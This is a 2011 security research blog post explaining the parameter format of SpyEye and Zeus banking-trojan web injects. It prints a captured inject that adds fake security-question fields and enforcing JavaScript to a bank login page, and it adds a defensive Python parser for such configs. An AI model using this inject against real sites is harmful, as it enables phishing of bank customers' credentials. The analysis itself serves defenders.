Sunday, July 3, 2011

(SpyEye & Zeus) Web Injects - Parameters

We are in the process of analyzing an enormous set of web inject logs and real client-side code. During the analysis, we found that third-generation botnets (Zeus and SpyEye) use an explicit technique for injecting rogue content into the web pages of bank websites. The content is injected inline, but the plugins used to complete this process follow a defined set of parameters and a defined procedure. In this post, we are going to talk about the parameters that are used to perform web injects successfully. The plugin communicates with the bot installed on the client side, and a specific sequence of steps is followed, as part of the hierarchical infection, in order to trick the browser.

The installed bot understands the following parameters:

1. set_url [Target to inject]
The set_url parameter instantiates an object that points to the website targeted for web injects. The bot uses this parameter to scan HTTP requests for a possible match of the website so that the injection can be performed.

2. data_before / data_end
These parameters are used to place the injection code in an appropriate manner so that the HTML looks fine and does not show broken tags. Generally, these parameters define the base of the web inject, because the injected data comprises the HTML tags to be injected before the main injection. Further, "data_before / data_end" also anchors the position in the HTML at which the data is to be injected.

3. data_inject | data_end
These parameters are the main killing part, in which the real web injects are placed. The rogue or illegitimate JavaScript/HTML code is set in these parameters and is injected into the legitimate bank website or any proprietary financial website.

4. data_after | data_end
These are the last set of parameters, used to complete the web inject by placing the requisite HTML tags at the end of the injected code. Again, the purpose is to render the HTML successfully and inline with the main webpage of the website.

This collective set of parameters can also be used to inject multiple pieces of code into the target website.

One real example of injected code is presented below:
set_url https://target_website/login.html* GP
data_before
name="password"*[/tr]
data_end
data_inject
[TD][FONT class=userinfo] What is your favourite meal or restaurant? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q1] [/TD][/TR]
[TD][FONT class=userinfo] The name of a memorable place to you? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q2] [/TD][/TR]
[TD][FONT class=userinfo] Your favourite film of all time? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q3] [/TD][/TR]
[TD][FONT class=userinfo] Your favourite book of all time? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q4] [/TD][/TR]
[TD][FONT class=userinfo] Your favourite teacher or subject? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q5] [/TD][/TR]
[TD][FONT class=userinfo] Your favourite TV star or show? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q6] [/TD][/TR]

data_end
data_after
data_end


data_before
var cusID*;
data_end
data_inject


if (document.forms[0].q1.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q1.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q2.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q2.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q3.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q3.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q4.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q4.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q5.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q5.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q6.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q6.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}

data_end
data_after
data_end


These examples clarify exactly how the web inject code works and how it is rendered in the webpages by the installed bot.
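As an added example (not code from the original post or from the bots themselves), a small Python parser for the configuration format shown above: it splits a captured config into set_url targets and their data_before / data_inject / data_after triples so the rogue content can be searched, and applies the set_url wildcard semantics so a defender can check which of a site's own URLs a config targets. SAMPLE_CONFIG is a constructed mini config in the same shape as the sample above, not the real one.

```python
import re

# Constructed mini config in the format of the sample above (not the real one).
SAMPLE_CONFIG = """\
set_url https://target_website/login.html* GP
data_before
name="password"*[/tr]
data_end
data_inject
[TD][INPUT tabIndex=1 name=q1][/TD][/TR]
data_end
data_after
data_end
data_before
var cusID*;
data_end
data_inject
if (document.forms[0].q1.value.length < 2) { return false; }
data_end
"""

def parse_webinjects(text):
    """-> [{'url', 'flags', 'rules': [{'before', 'inject', 'after'}, ...]}]."""
    targets, rule, block, body = [], None, None, []
    for raw in text.splitlines():
        line = raw.strip()
        if block is not None:  # inside data_* ... data_end; body kept verbatim
            if line == "data_end":
                rule[block[5:]] = "\n".join(body).strip()  # "data_before" -> "before"
                block = None
            else:
                body.append(raw)
        elif line.startswith("set_url"):  # new target, e.g. "... GP" in the sample above
            parts = line.split(None, 2)
            targets.append({"url": parts[1], "flags": parts[2] if len(parts) > 2 else "", "rules": []})
            rule = None
        elif line in ("data_before", "data_inject", "data_after"):
            if not targets:
                raise ValueError(f"{line} before any set_url")
            if line == "data_before" or rule is None:  # new triple; data_after may be omitted
                rule = {"before": "", "inject": "", "after": ""}
                targets[-1]["rules"].append(rule)
            block, body = line, []
    return targets

def url_matches(pattern, url):
    """set_url semantics: '*' matches any run of characters; use it to check
    which of your own URLs a captured config targets."""
    return re.fullmatch(".*".join(map(re.escape, pattern.split("*"))), url) is not None
```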

SpyEye Malware Infection Framework - VB


We have just released the first part of our research on SpyEye in Virus Bulletin magazine. The next part of the research will be coming soon.

VB - SpyEye Malware Infection Framework